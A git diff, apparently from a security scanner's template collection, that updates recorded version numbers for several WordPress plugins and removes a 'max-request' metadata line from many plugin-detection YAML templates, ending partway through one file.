diff --git a/helpers/wordpress/plugins/gutenberg.txt b/helpers/wordpress/plugins/gutenberg.txt
index fe194a2640..d77ff0e21a 100644
--- a/helpers/wordpress/plugins/gutenberg.txt
+++ b/helpers/wordpress/plugins/gutenberg.txt
@@ -1 +1 @@
-16.6.0
\ No newline at end of file
+16.7.0
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/jetpack.txt b/helpers/wordpress/plugins/jetpack.txt
index 84799ae9fb..ae4a909e8d 100644
--- a/helpers/wordpress/plugins/jetpack.txt
+++ b/helpers/wordpress/plugins/jetpack.txt
@@ -1 +1 @@
-12.6.1
\ No newline at end of file
+12.6.2
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/mailpoet.txt b/helpers/wordpress/plugins/mailpoet.txt
index 4e940ae2a9..a7e74fdd6d 100644
--- a/helpers/wordpress/plugins/mailpoet.txt
+++ b/helpers/wordpress/plugins/mailpoet.txt
@@ -1 +1 @@
-4.28.0
\ No newline at end of file
+4.29.0
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/ml-slider.txt b/helpers/wordpress/plugins/ml-slider.txt
index 0dc31e89d8..6de2c86be0 100644
--- a/helpers/wordpress/plugins/ml-slider.txt
+++ b/helpers/wordpress/plugins/ml-slider.txt
@@ -1 +1 @@
-3.37.0
\ No newline at end of file
+3.40.0
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/nextgen-gallery.txt b/helpers/wordpress/plugins/nextgen-gallery.txt
index 423638af67..f2fe478687 100644
--- a/helpers/wordpress/plugins/nextgen-gallery.txt
+++ b/helpers/wordpress/plugins/nextgen-gallery.txt
@@ -1 +1 @@
-3.39
\ No newline at end of file
+3.41
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/premium-addons-for-elementor.txt b/helpers/wordpress/plugins/premium-addons-for-elementor.txt
index 4843910948..7a32ceff62 100644
--- a/helpers/wordpress/plugins/premium-addons-for-elementor.txt
+++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt
@@ -1 +1 @@
-4.10.10
\ No newline at end of file
+4.10.11
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt
index 0165858c68..72bd16b7c1 100644
--- a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt
+++ b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt
@@ -1 +1 @@
-2.7.10
\ No newline at end of file
+2.7.11
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/w3-total-cache.txt b/helpers/wordpress/plugins/w3-total-cache.txt
index 58073ef8d7..fad066f801 100644
--- a/helpers/wordpress/plugins/w3-total-cache.txt
+++ b/helpers/wordpress/plugins/w3-total-cache.txt
@@ -1 +1 @@
-2.4.1
\ No newline at end of file
+2.5.0
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/webp-converter-for-media.txt b/helpers/wordpress/plugins/webp-converter-for-media.txt
index 44c2012635..57f82f727c 100644
--- a/helpers/wordpress/plugins/webp-converter-for-media.txt
+++ b/helpers/wordpress/plugins/webp-converter-for-media.txt
@@ -1 +1 @@
-N/A
\ No newline at end of file
+5.11.0
\ No newline at end of file
diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index ebb5ba1042..7cbd1855ae 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
-    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index fddfbf3118..8d579ff23d 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
-    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 7a6e8a76ec..4a6d8b7bbe 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
-    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index 940c0e614c..e4eb308d39 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
-    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index ac77f4e5f5..f68ad2a6bf 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
-    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 90aa5881fd..10f104f2c7 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
-    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 1bf337da6c..8addc28ded 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 7cec152555..2e579621ac 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 8a4b6133cd..41e297ffeb 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index cfa2e3d080..0dd8686ec3 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
-    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index a92d9bde4e..359671f3bd 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
-    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 59144c7dd5..116e0c420a 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
-    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index df06ba2f35..dc4703ef8d 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 2a79d529cc..1426ac3ef2 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
-    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 556a113acc..78d1651ff4 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
-    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index 58d9a9d738..f7219b373d 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
-    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index 6c9c485079..f688a68f72 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
-    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 7631e87d78..00e95c4263 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
-    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index c7daa26ac6..212b2b13c4 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
-    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 68767e4dce..6318392c5c 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
-    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index 073618936d..e1a2a186e0 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
-    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 6aabc19e9f..23614882a7 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
-    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index ac80e4f31b..85965337cb 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
-    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 15d7a24755..33d903a1b4 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 40ccc15b27..3c6f8f287b 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
-    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index 1fad3cee08..c3b630cde2 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
-    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index ebe4ee41a7..5c8ce709b6 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
-    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index 5c32110e0e..aea47b9e84 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
-    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 09c2e2f360..78c584c388 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
-    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 1a2e8beb3e..2c80d09c27 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
-    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 706145493c..4b1b3a8754 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index cf6a6ee635..06ad83bdf7 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index c039765929..b20666268f 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index a2c92dff4b..b2a097bfe7 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index 41b5d6c854..c71fa258af 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index cca31cc3a9..5a98e67597 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
-    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index ff9c0a49ce..4463174203 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
-    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index a76d3306bb..cfac0b961b 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
-    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 2249681b6d..846761f2f7 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
-    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index b5389b27c9..0def6e61ca 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
-    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 00d183f507..5c5decc127 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
-    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index 451e1daef1..a8229a338e 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index af30ca76b6..6559e64dce 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index 93823466d4..a4368b8aa6 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index e224283ecd..ec119e762a 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
-    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index 9af8df08a7..b7ec7576a3 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
-    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index d4081474c3..c42d679973 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
-    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index bcbc0707fb..fc44375947 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
-    max-request: 1
     plugin_namespace: easy-table-of-contents
